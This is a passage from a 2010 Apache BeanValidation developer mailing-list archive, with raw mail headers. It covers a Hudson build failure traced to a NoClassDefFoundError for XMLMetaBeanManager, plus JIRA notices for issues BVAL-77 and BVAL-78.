vt+BFqEIEoNA+IMoo0rWN6sc8jLO3qjQHIimQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=content-type:mime-version:subject:from:in-reply-to:date :content-transfer-encoding:message-id:references:to:x-mailer; b=fxYbmaYSZk2qtlILdyJX36Iq+Ese1d0rC9y0BSGZGQB1CIzcxPTkbi8nBdVtl0OWMS hPGo9vsZhZfeDPsIcYuRQWCYOqbMKr4XPaT8jg8ZBwGKPemtbgVN61vpfXHlIWM7tw0o ffG8sTQvtyILGSKHztNy2zfmzX5FZeT7U2r/8= Received: by 161.129.204.104 with SMTP id s7mr2840023ybj.379.1278700329502; Fri, 09 Jul 2010 11:32:09 -0700 (PDT) Received: from [161.129.204.104] (adsl-068-213-090-227.sip.bhm.bellsouth.net [161.129.204.104]) by mx.google.com with ESMTPS id q21sm438044ybk.3.2161.129.204.104.32.07 (version=TLSv1/SSLv3 cipher=RC4-MD5); Fri, 09 Jul 2010 11:32:08 -0700 (PDT) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1081) Subject: Re: Hudson build is still unstable: BeanValidation-trunk-windows #40 From: Matt Benson <[email protected]> In-Reply-To: <[email protected]> Date: Fri, 9 Jul 2010 13:31:43 -0500 Content-Transfer-Encoding: quoted-printable Message-Id: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1081) X-Virus-Checked: Checked by ClamAV on apache.org On Jul 9, 2010, at 1:26 PM, Donald Woods wrote: > Well, these look like valid failuresin bval-guice due to recent = changes > (I can recreate on my Mac with 1.6.0_20)... All 4 failures have the > same cause - >=20 Weird, because I'm running 'mvn test' from bval/ and get full success. = What command line are you using to recreate the problem? When I went = out to Hudson I saw those "error parsing repository.xml" errors that you = had reported to the builds list last month, so assumed that was the = reason the dependency class wasn't found. Regards, Matt > Error injecting constructor, java.lang.NoClassDefFoundError: > org/apache/bval/xml/XMLMetaBeanManager > at > = org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) > while locating org.apache.bval.guice.ValidatorProvider > while locating javax.validation.Validator > for field at > = org.apache.bval.guice.ValidateMethodInterceptor.validator(ValidateMethodIn= terceptor.java:53) > at > = org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60)= >=20 >=20 > On 7/9/10 1:47 PM, Matt Benson wrote: >> I see this has happened before; anyone know what fixes it? :| >>=20 >> -Matt >>=20 >> On Jul 9, 2010, at 12:43 PM, Apache Hudson Server wrote: >>=20 >>> See = <http://hudson.zones.apache.org/hudson/job/BeanValidation-trunk-windows/ch= anges> >>>=20 >>>=20 >>=20 >>=20 From [email protected] Fri Jul 09 18:34:16 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74975 invoked from network); 9 Jul 2010 18:34:15 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 18:34:15 -0000 Received: (qmail 44459 invoked by uid 500); 9 Jul 2010 18:34:15 -0000 Delivered-To: [email protected] Received: (qmail 44411 invoked by uid 500); 9 Jul 2010 18:34:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44399 invoked by uid 99); 9 Jul 2010 18:34:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:34:15 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:34:12 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69IXpBa006842 for <[email protected]>; Fri, 9 Jul 2010 18:33:51 GMT Message-ID: <28078755.289351278700431281.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 14:33:51 -0400 (EDT) From: "Donald Woods (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (BVAL-77) bval-guice needs the optional bval-xstream module In-Reply-To: <32059518.289291278700309363.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-77?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Donald Woods resolved BVAL-77. ------------------------------ Resolution: Fixed Committed revision 962625. > bval-guice needs the optional bval-xstream module > ------------------------------------------------- > > Key: BVAL-77 > URL: https://issues.apache.org/jira/browse/BVAL-77 > Project: BeanValidation > Issue Type: Bug > Components: build > Affects Versions: 0.2-incubating > Reporter: Donald Woods > Assignee: Donald Woods > Fix For: 0.2-incubating > > > After recent changes in BVAL-75 (seem unrelated though....) the bval-guice module junits failed due to - > Error injecting constructor, java.lang.NoClassDefFoundError: org/apache/bval/xml/XMLMetaBeanManager > at org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) > while locating org.apache.bval.guice.ValidatorProvider > while locating javax.validation.Validator > for [email protected](ValidateMethodInterceptor.java:53) > at org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60) > which is now in the optional bval-xstream module. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 18:39:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75886 invoked from network); 9 Jul 2010 18:39:43 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 18:39:43 -0000 Received: (qmail 51360 invoked by uid 500); 9 Jul 2010 18:39:43 -0000 Delivered-To: [email protected] Received: (qmail 51331 invoked by uid 500); 9 Jul 2010 18:39:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51323 invoked by uid 99); 9 Jul 2010 18:39:43 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:39:43 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:39:41 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69IVntW006823 for <[email protected]>; Fri, 9 Jul 2010 18:31:49 GMT Message-ID: <32059518.289291278700309363.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 14:31:49 -0400 (EDT) From: "Donald Woods (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (BVAL-77) bval-guice needs the optional bval-xstream module MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org bval-guice needs the optional bval-xstream module ------------------------------------------------- Key: BVAL-77 URL: https://issues.apache.org/jira/browse/BVAL-77 Project: BeanValidation Issue Type: Bug Components: build Affects Versions: 0.2-incubating Reporter: Donald Woods Assignee: Donald Woods Fix For: 0.2-incubating After recent changes in BVAL-75 (seem unrelated though....) the bval-guice module junits failed due to - Error injecting constructor, java.lang.NoClassDefFoundError: org/apache/bval/xml/XMLMetaBeanManager at org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) while locating org.apache.bval.guice.ValidatorProvider while locating javax.validation.Validator for [email protected](ValidateMethodInterceptor.java:53) at org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60) which is now in the optional bval-xstream module. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 18:45:16 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76803 invoked from network); 9 Jul 2010 18:45:15 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 18:45:15 -0000 Received: (qmail 57016 invoked by uid 500); 9 Jul 2010 18:45:15 -0000 Delivered-To: [email protected] Received: (qmail 56974 invoked by uid 500); 9 Jul 2010 18:45:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56966 invoked by uid 99); 9 Jul 2010 18:45:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:45:15 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:45:12 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69IiprF007016 for <[email protected]>; Fri, 9 Jul 2010 18:44:51 GMT Message-ID: <10904718.289781278701091136.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 14:44:51 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (BVAL-78) Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints ------------------------------------------------------------------------------------------------------ Key: BVAL-78 URL: https://issues.apache.org/jira/browse/BVAL-78 Project: BeanValidation Issue Type: Improvement Components: jsr303 Affects Versions: 0.2-incubating Reporter: Matt Benson Attachments: BVAL-78.patch.txt Numerous warnings abound in ConstraintViolation due to the fact that ConstraintValidationListener must be used as a raw type. Further the GroupValidationContext must be cast to a BeanValidationContext so that the listener reference can be reset, which doesn't feel optimal either. The attached patch: * Modifies GroupValidationContext<T> such that, rather than extending ValidationContext<T> where T extends ValidationListener, it instead expressly implements ValidationContext<ConstraintValidationListener<T>> (T is now effectively the same type variable as ConstraintValidationListener<T>). Now GroupValidationContext.getListener() expressly returns a ConstraintValidationListener. * Adds state management for @ReportAsSingleViolation composed constraints to ConstraintValidationListener so that the original listener instance can be used throughout. * The reportAsSingle execution path bails as soon as it is known that a composing constraint has failed. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 18:45:16 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76850 invoked from network); 9 Jul 2010 18:45:16 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 18:45:16 -0000 Received: (qmail 57087 invoked by uid 500); 9 Jul 2010 18:45:16 -0000 Delivered-To: [email protected] Received: (qmail 57039 invoked by uid 500); 9 Jul 2010 18:45:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57031 invoked by uid 99); 9 Jul 2010 18:45:16 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:45:16 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:45:13 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69IiqHF007025 for <[email protected]>; Fri, 9 Jul 2010 18:44:52 GMT Message-ID: <19373660.289811278701092055.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 14:44:52 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-78) Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints In-Reply-To: <10904718.289781278701091136.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-78?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-78: ---------------------------- Attachment: BVAL-78.patch.txt > Avoid unsafe casting and object swapping when processing @ReportAsSingleViolation composed constraints > ------------------------------------------------------------------------------------------------------ > > Key: BVAL-78 > URL: https://issues.apache.org/jira/browse/BVAL-78 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: BVAL-78.patch.txt > > > Numerous warnings abound in ConstraintViolation due to the fact that ConstraintValidationListener must be used as a raw type. Further the GroupValidationContext must be cast to a BeanValidationContext so that the listener reference can be reset, which doesn't feel optimal either. The attached patch: > * Modifies GroupValidationContext<T> such that, rather than extending ValidationContext<T> where T extends ValidationListener, it instead expressly implements ValidationContext<ConstraintValidationListener<T>> (T is now effectively the same type variable as ConstraintValidationListener<T>). Now GroupValidationContext.getListener() expressly returns a ConstraintValidationListener. > * Adds state management for @ReportAsSingleViolation composed constraints to ConstraintValidationListener so that the original listener instance can be used throughout. > * The reportAsSingle execution path bails as soon as it is known that a composing constraint has failed. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 18:46:59 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77020 invoked from network); 9 Jul 2010 18:46:59 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 18:46:59 -0000 Received: (qmail 57437 invoked by uid 500); 9 Jul 2010 18:46:59 -0000 Delivered-To: [email protected] Received: (qmail 57399 invoked by uid 500); 9 Jul 2010 18:46:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57391 invoked by uid 99); 9 Jul 2010 18:46:59 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:46:59 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp101.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 09 Jul 2010 18:46:51 +0000 Received: (qmail 59747 invoked from network); 9 Jul 2010 18:45:30 -0000 Received: from drwoods.local ([email protected] with plain) by smtp101.prem.mail.ac4.yahoo.com with SMTP; 09 Jul 2010 11:45:29 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: z__nLFgVM1lios6xUSCGgsQNFVrRb8mSYENA_JnpohVQTDu hc7nF2zzBJCcA3sGus_O.xaJ_YUxjRPc4dmd.PvLRyo2AAPj7l7XYXF57BYs mrOX.wnKu3YDeN8H7m8RhEuAIQdzWUODHpk_zy6P2CkrsNvqbihPf3v7cQiM J1v2Fq3w9WdmSj822MckOU41CwlD2XatrLDaPcowJ77hqYM.vRi.LsMPLhRG HD_h0dgY9Xp.7_TBeWYAiz0MEyNqNnhBjHAy0ZWjeGbCx.7SlKZAs5fHGmvn TbYdai2p9z4XUBNY44EAsNmm0p7yQSJWPCkq1ZiL5AeMPGnDYuapY3g-- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Fri, 09 Jul 2010 14:45:29 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] Subject: Re: Hudson build is still unstable: BeanValidation-trunk-windows #40 References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org I just did a "mvn clean install" from the project root and hit the problem. Seems that there were changes in return types in - bval-jsr303/src/main/java/org/apache/bval/jsr303/ApacheFactoryContext.java that is now causing the bval-xstream to be required, instead of optional. I redo the changes in BVAL-77 to fix this. -Donald On 7/9/10 2:31 PM, Matt Benson wrote: > > On Jul 9, 2010, at 1:26 PM, Donald Woods wrote: > >> Well, these look like valid failuresin bval-guice due to recent changes >> (I can recreate on my Mac with 1.6.0_20)... All 4 failures have the >> same cause - >> > > Weird, because I'm running 'mvn test' from bval/ and get full success. What command line are you using to recreate the problem? When I went out to Hudson I saw those "error parsing repository.xml" errors that you had reported to the builds list last month, so assumed that was the reason the dependency class wasn't found. > > Regards, > Matt > >> Error injecting constructor, java.lang.NoClassDefFoundError: >> org/apache/bval/xml/XMLMetaBeanManager >> at >> org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) >> while locating org.apache.bval.guice.ValidatorProvider >> while locating javax.validation.Validator >> for field at >> org.apache.bval.guice.ValidateMethodInterceptor.validator(ValidateMethodInterceptor.java:53) >> at >> org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60) >> >> >> On 7/9/10 1:47 PM, Matt Benson wrote: >>> I see this has happened before; anyone know what fixes it? :| >>> >>> -Matt >>> >>> On Jul 9, 2010, at 12:43 PM, Apache Hudson Server wrote: >>> >>>> See <http://hudson.zones.apache.org/hudson/job/BeanValidation-trunk-windows/changes> >>>> >>>> >>> >>> > > From [email protected] Fri Jul 09 18:49:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77297 invoked from network); 9 Jul 2010 18:49:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 18:49:14 -0000 Received: (qmail 60732 invoked by uid 500); 9 Jul 2010 18:49:14 -0000 Delivered-To: [email protected] Received: (qmail 60701 invoked by uid 500); 9 Jul 2010 18:49:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60693 invoked by uid 99); 9 Jul 2010 18:49:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:49:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:49:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69Imov4007042 for <[email protected]>; Fri, 9 Jul 2010 18:48:50 GMT Message-ID: <23822516.289851278701330060.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 14:48:50 -0400 (EDT) From: "Donald Woods (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Reopened: (BVAL-77) bval-guice needs the optional bval-xstream module In-Reply-To: <32059518.289291278700309363.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-77?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Donald Woods reopened BVAL-77: ------------------------------ Problem is actual caused by BVAL-75, in that method signatures were changed to return XMLMetaBeanManager, which now causes bval-xstream to be required, which we don't want. > bval-guice needs the optional bval-xstream module > ------------------------------------------------- > > Key: BVAL-77 > URL: https://issues.apache.org/jira/browse/BVAL-77 > Project: BeanValidation > Issue Type: Bug > Components: build > Affects Versions: 0.2-incubating > Reporter: Donald Woods > Assignee: Donald Woods > Fix For: 0.2-incubating > > > After recent changes in BVAL-75 (seem unrelated though....) the bval-guice module junits failed due to - > Error injecting constructor, java.lang.NoClassDefFoundError: org/apache/bval/xml/XMLMetaBeanManager > at org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) > while locating org.apache.bval.guice.ValidatorProvider > while locating javax.validation.Validator > for [email protected](ValidateMethodInterceptor.java:53) > at org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60) > which is now in the optional bval-xstream module. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 18:51:31 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77663 invoked from network); 9 Jul 2010 18:51:30 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 18:51:30 -0000 Received: (qmail 67932 invoked by uid 500); 9 Jul 2010 18:51:30 -0000 Delivered-To: [email protected] Received: (qmail 67907 invoked by uid 500); 9 Jul 2010 18:51:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67899 invoked by uid 99); 9 Jul 2010 18:51:30 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:51:30 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:51:21 +0000 Received: by gwj22 with SMTP id 22so1612926gwj.6 for <[email protected]>; Fri, 09 Jul 2010 11:49:59 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:content-type:mime-version :subject:from:in-reply-to:date:content-transfer-encoding:message-id :references:to:x-mailer; bh=UowZL41siCrSg7KKEIMKTcTw8tfqEEOnDT0amyXa0+s=; b=cS1hI8n85Uhy4/7a8/v9Q6EEtymBwyyhlth8dklg3Gc/1CdXdfc4UqATORtbmouwsf GGE8byJineazzOSGjzDHSKo1Wh16tTeRFZ+8CmjWFB48BBgnWb4l5dNX9YQvSiWjpr48 Bnwgn5GwHObSGVz1rcCQlqjmV5lw2XIRq3O+g= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=content-type:mime-version:subject:from:in-reply-to:date :content-transfer-encoding:message-id:references:to:x-mailer; b=FCaPchP5YKtxci0UX19H60inQ6190kB17EmjKbfrk5hKAMNFiCpnudOPiJ3NhYA/UJ CgtSvKzsCriis1zl6aFEaKKN9SrFXFPc3sbqnKCC9pn0uALGbqSst0RYKhmtapjW4Azg nvBaIj/yi6W1B5OP1FgvrqdhqARqwOuMHo+pM= Received: by 161.129.204.104 with SMTP id t3mr12111948anm.137.1278701398665; Fri, 09 Jul 2010 11:49:58 -0700 (PDT) Received: from [161.129.204.104] (adsl-068-213-090-227.sip.bhm.bellsouth.net [161.129.204.104]) by mx.google.com with ESMTPS id q38sm13675162anh.11.2161.129.204.104.49.57 (version=TLSv1/SSLv3 cipher=RC4-MD5); Fri, 09 Jul 2010 11:49:58 -0700 (PDT) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1081) Subject: Re: Hudson build is still unstable: BeanValidation-trunk-windows #40 From: Matt Benson <[email protected]> In-Reply-To: <[email protected]> Date: Fri, 9 Jul 2010 13:49:55 -0500 Content-Transfer-Encoding: quoted-printable Message-Id: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1081) X-Virus-Checked: Checked by ClamAV on apache.org On Jul 9, 2010, at 1:45 PM, Donald Woods wrote: > I just did a "mvn clean install" from the project root and hit the > problem. Seems that there were changes in return types in - > = bval-jsr303/src/main/java/org/apache/bval/jsr303/ApacheFactoryContext.java= > that is now causing the bval-xstream to be required, instead of > optional. I redo the changes in BVAL-77 to fix this. >=20 I just saw that I had caused that. Sorry about that. :/ -Matt >=20 > -Donald >=20 >=20 > On 7/9/10 2:31 PM, Matt Benson wrote: >>=20 >> On Jul 9, 2010, at 1:26 PM, Donald Woods wrote: >>=20 >>> Well, these look like valid failuresin bval-guice due to recent = changes >>> (I can recreate on my Mac with 1.6.0_20)... All 4 failures have the >>> same cause - >>>=20 >>=20 >> Weird, because I'm running 'mvn test' from bval/ and get full = success. What command line are you using to recreate the problem? When = I went out to Hudson I saw those "error parsing repository.xml" errors = that you had reported to the builds list last month, so assumed that was = the reason the dependency class wasn't found. >>=20 >> Regards, >> Matt >>=20 >>> Error injecting constructor, java.lang.NoClassDefFoundError: >>> org/apache/bval/xml/XMLMetaBeanManager >>> at >>> = org.apache.bval.guice.ValidatorProvider.<init>(ValidatorProvider.java:45) >>> while locating org.apache.bval.guice.ValidatorProvider >>> while locating javax.validation.Validator >>> for field at >>> = org.apache.bval.guice.ValidateMethodInterceptor.validator(ValidateMethodIn= terceptor.java:53) >>> at >>> = org.apache.bval.guice.ValidationModule.configure(ValidationModule.java:60)= >>>=20 >>>=20 >>> On 7/9/10 1:47 PM, Matt Benson wrote: >>>> I see this has happened before; anyone know what fixes it? :| >>>>=20 >>>> -Matt >>>>=20 >>>> On Jul 9, 2010, at 12:43 PM, Apache Hudson Server wrote: >>>>=20 >>>>> See = <http://hudson.zones.apache.org/hudson/job/BeanValidation-trunk-windows/ch= anges> >>>>>=20 >>>>>=20 >>>>=20 >>>>=20 >>=20 >>=20 From [email protected] Fri Jul 09 18:53:16 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77934 invoked from network); 9 Jul 2010 18:53:15 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Jul 2010 18:53:15 -0000 Received: (qmail 70485 invoked by uid 500); 9 Jul 2010 18:53:15 -0000 Delivered-To: [email protected] Received: (qmail 70447 invoked by uid 500); 9 Jul 2010 18:53:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70439 invoked by uid 99); 9 Jul 2010 18:53:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:53:15 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jul 2010 18:53:13 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o69IqpCu007164 for <[email protected]>; Fri, 9 Jul 2010 18:52:51 GMT Message-ID: <12052776.290201278701571255.JavaMail.jira@thor> Date: Fri, 9 Jul 2010 14:52:51 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-77) bval-guice needs the optional bval-xstream module In-Reply-To: <32059518.289291278700309363.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ 